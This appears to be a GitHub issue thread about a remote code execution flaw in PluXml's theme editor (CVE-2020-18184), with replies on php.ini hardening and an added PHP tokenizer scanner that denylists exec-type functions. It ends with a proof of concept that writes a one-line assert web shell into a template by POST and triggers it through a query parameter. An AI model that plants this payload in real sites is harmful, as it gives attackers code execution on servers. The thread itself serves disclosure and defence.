An issue in the theme edit function #320
Comments
Hello,
You can disable the assert evaluation in php.ini.
assert_options(ASSERT_ACTIVE,false); at the beginning of the index.php file?
Any news?
In fact, I think it's not a good idea for webadmin to be able to edit .php file directly.
Hello, it appears CVE-2020-18184 has been assigned to this issue. However, the documentation seems to include a lot of instructions for how to execute arbitrary code in themes:
https://wiki.pluxml.org/developper/developpement/ The examples even make extensive use of Is this working as intended? Thanks
A new function plxUtils::sanitizePhp has been added to PluXml. Of course, it's better to disable these critical functions in php.ini.
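The sanitizing approach mentioned above, as an added example that is not PluXml's `plxUtils::sanitizePhp` or any other code from the project: a tokenizer-based scan that an admin-side save handler could run on template content before writing it to disk. It assumes PHP 7.4 or newer with the tokenizer extension; the function list and the sample templates are constructed for the illustration.

```php
<?php
// Added example (not PluXml's plxUtils::sanitizePhp): scan a theme template with
// PHP's tokenizer and report calls to functions commonly abused for code execution,
// so an admin-side save handler can reject the content before writing it to disk.
const DANGEROUS_FUNCTIONS = ['assert', 'exec', 'system', 'passthru', 'shell_exec',
    'popen', 'proc_open', 'pcntl_exec', 'create_function'];

// Returns "name@line" for every dangerous call found; an empty array means clean.
function findDangerousCalls(string $source): array
{
    // Drop whitespace and comments so that adjacent tokens are the real neighbours.
    $tokens = array_values(array_filter(token_get_all($source), fn($t) =>
        !is_array($t) || !in_array($t[0], [T_WHITESPACE, T_COMMENT, T_DOC_COMMENT], true)));
    $found = [];
    $line = 1;
    foreach ($tokens as $i => $tok) {
        if ($tok === '`') {                      // backtick operator is shell_exec()
            $found[] = "backtick@$line";
            continue;
        }
        if (!is_array($tok)) {
            continue;
        }
        [$id, $text, $line] = $tok;
        if ($id === T_EVAL) {                    // eval is a keyword, not a T_STRING
            $found[] = "eval@$line";
            continue;
        }
        // PHP 7 tokenizes \assert as T_NS_SEPARATOR + T_STRING; PHP 8 emits a single
        // T_NAME_FULLY_QUALIFIED token, so accept both and strip the leading backslash.
        $isName = $id === T_STRING
            || (defined('T_NAME_FULLY_QUALIFIED') && $id === T_NAME_FULLY_QUALIFIED);
        $name = strtolower(ltrim($text, '\\'));
        if (!$isName || !in_array($name, DANGEROUS_FUNCTIONS, true)) {
            continue;
        }
        $prev = $tokens[$i - 1] ?? null;
        // $obj->system(), Foo::exec() and "function exec()" are not calls to the builtin.
        $isOwn = is_array($prev)
            && in_array($prev[0], [T_OBJECT_OPERATOR, T_DOUBLE_COLON, T_FUNCTION], true);
        if (($tokens[$i + 1] ?? null) === '(' && !$isOwn) {
            $found[] = "$name@$line";
        }
    }
    return $found;
}

// Constructed inputs: the payload quoted in this issue, then a harmless template.
var_dump(findDangerousCalls("<?php assert(\$_REQUEST['c']); ?>"));
var_dump(findDangerousCalls("<?php echo htmlspecialchars(\$title); ?>"));
```

A denylist like this only narrows the attack surface of an editor that saves PHP files; the php.ini hardening discussed in this thread (disabling assert evaluation and the exec family) remains the stronger control.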
The theme edit function /PluXml/core/admin/parametres_edittpl.php allows remote attackers to execute arbitrary PHP code by placing this code into a template.
PoC:
![image](https://user-images.githubusercontent.com/9081952/52915299-24698f80-330d-11e9-88d4-796c2bca6205.png)
/PluXml/core/admin/parametres_edittpl.php [POST]token=603b37bed4a91d8b18a3507c46ae27df644a2ff4&template=%2Ftags.php&submit=Save+the+file&tpl=%2Ftags.php&content=%3C%3Fphp+assert%28%24_REQUEST%5B%27c%27%5D%29%3B%3F%3E%0D%0A
then visit /PluXml/themes/defaut/tags.php?c=phpinfo();